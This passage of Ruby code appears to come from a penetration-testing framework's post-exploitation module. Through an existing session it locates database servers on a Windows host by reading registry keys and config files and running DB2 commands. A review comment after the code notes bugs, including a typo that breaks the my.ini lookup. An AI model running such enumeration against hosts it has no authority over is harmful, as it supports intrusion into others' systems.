end
# method for Checking if database instances are installed on host - oracle
def check_oracle
key = "HKLM\\SOFTWARE\\Oracle"
if registry_enumkeys(key).include?("ALL_HOMES")
print_status("\tOracle Server found.")
return true
elsif registry_enumkeys(key).include?("SYSMAN")
print_status("\tOracle Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - db2
def check_db2
key = "HKLM\\SOFTWARE\\IBM\\DB2"
if registry_enumkeys(key).include?("GLOBAL_PROFILE")
print_status("\tDB2 Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - mysql
def check_mysql
key = "HKLM\\SOFTWARE"
if registry_enumkeys(key).include?("MySQL AB")
print_status("\tMySQL Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - sybase
def check_sybase
key = "HKLM\\SOFTWARE\\Sybase"
if registry_enumkeys(key).include?("SQLServer")
print_status("\tSybase Server found.")
return true
elsif registry_enumkeys(key).include?("Server")
print_status("\tSybase Server found.")
return true
end
return false
rescue
return false
end
##### deep analysis methods #####
# method to identify mssql instances
def enumerate_mssql
results = []
key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL"
instances = registry_enumvals(key)
if not instances.nil? and not instances.empty?
instances.each do |i|
tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll"
tcpport = registry_getvaldata(tcpkey,"TcpPort")
print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})")
results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport]
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify oracle instances
def enumerate_oracle
results = []
basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN"
instances = registry_enumkeys(basekey)
if instances.nil? or instances.empty?
print_error("\t\t! Oracle instances not found")
return results
end
instances.each do |i|
key = "#{basekey}\\#{i}"
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME")
if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
next
end
data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
if data_TNSNAMES =~ /PORT\ \=\ (\d+)/
port = $1
print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})")
results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ]
else
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify mysql instances
def enumerate_mysql
results = []
basekey = "HKLM\\SOFTWARE\\MySQL AB"
instances = registry_enumkeys(basekey)
if instances.nil? or instances.empty?
return results
end
instances.each do |i|
key = "#{basekey}\\#{i}"
val_location = registry_getvaldata(key,"Location")
data = find_mysql_conf(val_location)
if data and data =~ /port\=(\d+)/
port = $1
print_good("\t\t+ MYSQL (Port:#{port})")
results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port]
else
print_error("\t\t! could not identify information")
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify sybase instances
def enumerate_sybase
basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer"
instance = registry_getvaldata(basekey,"DSLISTEN")
location = registry_getvaldata(basekey,"RootDir")
results = []
if not exist?(location + "\\ini\\sql.ini")
print_error("\t\t! could not locate configuration file.")
return results
end
data = read_file(location + "\\ini\\sql.ini")
if data =~ /\[#{instance}\]([^\[]*)/
segment = $1
else
print_error("\t\t! couldnt locate information.")
return results
end
if segment =~ /master\=\w+\,[^\,]+\,(\d+)/
port = $1
else
print_error("\t\t! couldnt locate information.")
return results
end
print_good("\t\t+ #{instance} (Port:#{port})")
results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ]
return results
rescue
print_error("\t\t! couldnt locate information.")
return results || []
end
# method to identify db2 instances
def enumerate_db2
results = []
cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist")
cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg")
if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/
port = $1
else
print_error("\t\t! could not identify instances information")
return results
end
windir = session.fs.file.expand_path("%windir%")
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")
data = read_file("#{file['path']}\\#{file['name']}")
break if not data.nil?
end
end
if data and data =~ /#{port}[\ \t]+(\d+)/
port_t = $1
else
print_error("\t\t! could not identify instances information")
return results
end
cmd_i.split("\n").compact.each do |line|
stripped=line.strip
print_good("\t\t+ #{stripped} (Port:#{port_t})")
results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ]
end
return results
rescue
print_error("\t\t! could not identify instances information")
return results || []
end
##### helper methods #####
def find_mysql_conf(val_location)
data = nil
if exist?(val_location + "\\my.ini")
data = read_file(val_Location + "\\my.ini")
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")
data = read_file("#{file['path']}\\#{file['name']}")
break
end
end
end
return data
end
end
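Review bot: find_mysql_conf reads `read_file(val_Location + "\\my.ini")` with a capital L while the parameter is `val_location`, so the my.ini branch always raises NameError; the bare `rescue` in enumerate_mysql then swallows it and prints "could not identify information", hiding the typo. The two `session.fs.file.search(..., recurse=true, timeout=-1)` calls in enumerate_db2 and find_mysql_conf are positional arguments written to look like keywords (each `x=` assigns a local), so `search(dir, pattern, true, -1)` says what actually happens. In enumerate_sybase the registry value is interpolated unescaped into `/\[#{instance}\]([^\[]*)/`; `Regexp.escape(instance)` keeps a DSLISTEN value containing regex metacharacters from altering or breaking the match. The bare `rescue` clauses around each enumerate_* method also mask every error the same way; rescuing the specific failures and logging the exception message would make the next typo visible. The first header line `# ## This file is part of` has a stray `##`.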